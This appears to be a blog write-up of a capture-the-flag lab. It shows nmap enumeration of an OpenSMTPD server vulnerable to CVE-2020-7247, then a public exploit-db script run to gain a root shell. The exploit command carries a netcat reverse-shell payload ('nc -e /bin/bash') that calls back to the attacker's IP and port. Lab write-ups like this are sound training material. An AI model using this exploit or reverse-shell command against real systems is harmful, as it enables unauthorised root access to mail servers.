rootđź’€muzec-sec:~#

Hack. Sleep. Repeat

View on GitHub

This is a target running a vulnerable OpenSMTPD instance of CVE-2020-7247.

Description

A vulnerability discovered in OpenSMTPD, OpenBSD’s mail server was exploitable since May 2018 (commit a8e222352f, “switch smtpd to new grammar”) and allows an attacker to execute arbitrary shell commands, as root.

Enumeration With Nmap

nmap -p- --min-rate 10000 -oA nmap/allports -v 10.0.100.33

# Nmap 7.91 scan initiated Sat Dec  4 09:26:10 2021 as: nmap -p- --min-rate 10000 -oA nmap/allports -v 10.0.100.33
Increasing send delay for 10.0.100.33 from 0 to 5 due to 230 out of 766 dropped probes since last increase.
Warning: 10.0.100.33 giving up on port because retransmission cap hit (10).
Increasing send delay for 10.0.100.33 from 640 to 1000 due to 108 out of 358 dropped probes since last increase.
Nmap scan report for 10.0.100.33
Host is up (0.15s latency).
Not shown: 40969 closed ports, 24565 filtered ports
PORT   STATE SERVICE
25/tcp open  smtp

Read data files from: /usr/bin/../share/nmap
# Nmap done at Sat Dec  4 09:27:14 2021 -- 1 IP address (1 host up) scanned in 64.35 seconds

What we always do let use some default nmap script and service detection on it.

nmap -sC -sV -oA nmap/normal -p 25 10.0.100.33

# Nmap 7.91 scan initiated Sat Dec  4 09:28:37 2021 as: nmap -sC -sV -oA nmap -p 25 10.0.100.33
Nmap scan report for 10.0.100.33
Host is up (0.21s latency).

PORT   STATE SERVICE VERSION
25/tcp open  smtp    OpenSMTPD
| smtp-commands: CVE-2020-7247.echocity-f.com Hello nmap.scanme.org [10.10.0.186], pleased to meet you, 8BITMIME, ENHANCEDSTATUSCODES, SIZE 36700160, DSN, HELP, 
|_ 2.0.0 This is OpenSMTPD 2.0.0 To report bugs in the implementation, please contact bugs@openbsd.org 2.0.0 with full details 2.0.0 End of HELP info 
Service Info: Host: CVE-2020-7247.echocity-f.com

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Sat Dec  4 09:28:45 2021 -- 1 IP address (1 host up) scanned in 7.42 seconds

Now let do some research on google and got an exploit on exploit-db already.

image

Smooth let run it.

┌──(muzec㉿Muzec-Security)-[~/Documents/echoctf/CVE-2020-7247]
└─$ python3 47984.py 10.0.100.33 25 'nc -e /bin/bash 10.10.0.186 1337'
[*] OpenSMTPD detected
[*] Connected, sending payload
[*] Payload sent
[*] Done

Now let check Ncat listener.

image

We are done.

Greeting From Muzec



Back To Home